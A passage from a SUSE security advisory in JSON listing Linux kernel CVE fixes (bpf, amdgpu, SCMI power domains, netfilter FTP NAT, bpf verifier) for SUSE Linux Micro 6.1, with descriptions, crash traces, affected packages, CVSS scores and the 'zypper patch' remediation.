"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68195"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: remove two invalid BUG_ON()s\n\nThose can be triggered trivially by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68201",
"url": "https://www.suse.com/security/cve/CVE-2025-68201"
},
{
"category": "external",
"summary": "SUSE Bug 1255136 for CVE-2025-68201",
"url": "https://bugzilla.suse.com/1255136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68201"
},
{
"cve": "CVE-2025-68204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npmdomain: arm: scmi: Fix genpd leak on provider registration failure\n\nIf of_genpd_add_provider_onecell() fails during probe, the previously\ncreated generic power domains are not removed, leading to a memory leak\nand potential kernel crash later in genpd_debug_add().\n\nAdd proper error handling to unwind the initialized domains before\nreturning from probe to ensure all resources are correctly released on\nfailure.\n\nExample crash trace observed without this fix:\n\n | Unable to handle kernel paging request at virtual address fffffffffffffc70\n | CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.18.0-rc1 #405 PREEMPT\n | Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform\n | pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n | pc : genpd_debug_add+0x2c/0x160\n | lr : genpd_debug_init+0x74/0x98\n | Call trace:\n | genpd_debug_add+0x2c/0x160 (P)\n | genpd_debug_init+0x74/0x98\n | do_one_initcall+0xd0/0x2d8\n | do_initcall_level+0xa0/0x140\n | do_initcalls+0x60/0xa8\n | do_basic_setup+0x28/0x40\n | kernel_init_freeable+0xe8/0x170\n | kernel_init+0x2c/0x140\n | ret_from_fork+0x10/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68204",
"url": "https://www.suse.com/security/cve/CVE-2025-68204"
},
{
"category": "external",
"summary": "SUSE Bug 1255224 for CVE-2025-68204",
"url": "https://bugzilla.suse.com/1255224"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68204"
},
{
"cve": "CVE-2025-68206",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68206"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_ct: add seqadj extension for natted connections\n\nSequence adjustment may be required for FTP traffic with PASV/EPSV modes.\ndue to need to re-write packet payload (IP, port) on the ftp control\nconnection. This can require changes to the TCP length and expected\nseq / ack_seq.\n\nThe easiest way to reproduce this issue is with PASV mode.\nExample ruleset:\ntable inet ftp_nat {\n ct helper ftp_helper {\n type \"ftp\" protocol tcp\n l3proto inet\n }\n\n chain prerouting {\n type filter hook prerouting priority 0; policy accept;\n tcp dport 21 ct state new ct helper set \"ftp_helper\"\n }\n}\ntable ip nat {\n chain prerouting {\n type nat hook prerouting priority -100; policy accept;\n tcp dport 21 dnat ip prefix to ip daddr map {\n\t\t\t192.168.100.1 : 192.168.13.2/32 }\n }\n\n chain postrouting {\n type nat hook postrouting priority 100 ; policy accept;\n tcp sport 21 snat ip prefix to ip saddr map {\n\t\t\t192.168.13.2 : 192.168.100.1/32 }\n }\n}\n\nNote that the ftp helper gets assigned *after* the dnat setup.\n\nThe inverse (nat after helper assign) is handled by an existing\ncheck in nf_nat_setup_info() and will not show the problem.\n\nTopoloy:\n\n +-------------------+ +----------------------------------+\n | FTP: 192.168.13.2 | \u003c-\u003e | NAT: 192.168.13.3, 192.168.100.1 |\n +-------------------+ +----------------------------------+\n |\n +-----------------------+\n | Client: 192.168.100.2 |\n +-----------------------+\n\nftp nat changes do not work as expected in this case:\nConnected to 192.168.100.1.\n[..]\nftp\u003e epsv\nEPSV/EPRT on IPv4 off.\nftp\u003e ls\n227 Entering passive mode (192,168,100,1,209,129).\n421 Service not available, remote server has closed connection.\n\nKernel logs:\nMissing nfct_seqadj_ext_add() setup call\nWARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41\n[..]\n __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat]\n nf_nat_ftp+0x142/0x280 [nf_nat_ftp]\n help+0x4d1/0x880 [nf_conntrack_ftp]\n nf_confirm+0x122/0x2e0 [nf_conntrack]\n nf_hook_slow+0x3c/0xb0\n ..\n\nFix this by adding the required extension when a conntrack helper is assigned\nto a connection that has a nat binding.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68206",
"url": "https://www.suse.com/security/cve/CVE-2025-68206"
},
{
"category": "external",
"summary": "SUSE Bug 1255142 for CVE-2025-68206",
"url": "https://bugzilla.suse.com/1255142"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68206"
},
{
"cve": "CVE-2025-68208",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68208"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: account for current allocated stack depth in widen_imprecise_scalars()\n\nThe usage pattern for widen_imprecise_scalars() looks as follows:\n\n prev_st = find_prev_entry(env, ...);\n queued_st = push_stack(...);\n widen_imprecise_scalars(env, prev_st, queued_st);\n\nWhere prev_st is an ancestor of the queued_st in the explored states\ntree. This ancestor is not guaranteed to have same allocated stack\ndepth as queued_st. E.g. in the following case:\n\n def main():\n for i in 1..2:\n foo(i) // same callsite, differnt param\n\n def foo(i):\n if i == 1:\n use 128 bytes of stack\n iterator based loop\n\nHere, for a second \u0027foo\u0027 call prev_st-\u003eallocated_stack is 128,\nwhile queued_st-\u003eallocated_stack is much smaller.\nwiden_imprecise_scalars() needs to take this into account and avoid\naccessing bpf_verifier_state-\u003eframe[*]-\u003estack out of bounds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68208",
"url": "https://www.suse.com/security/cve/CVE-2025-68208"
},
{
"category": "external",
"summary": "SUSE Bug 1255227 for CVE-2025-68208",
"url": "https://bugzilla.suse.com/1255227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
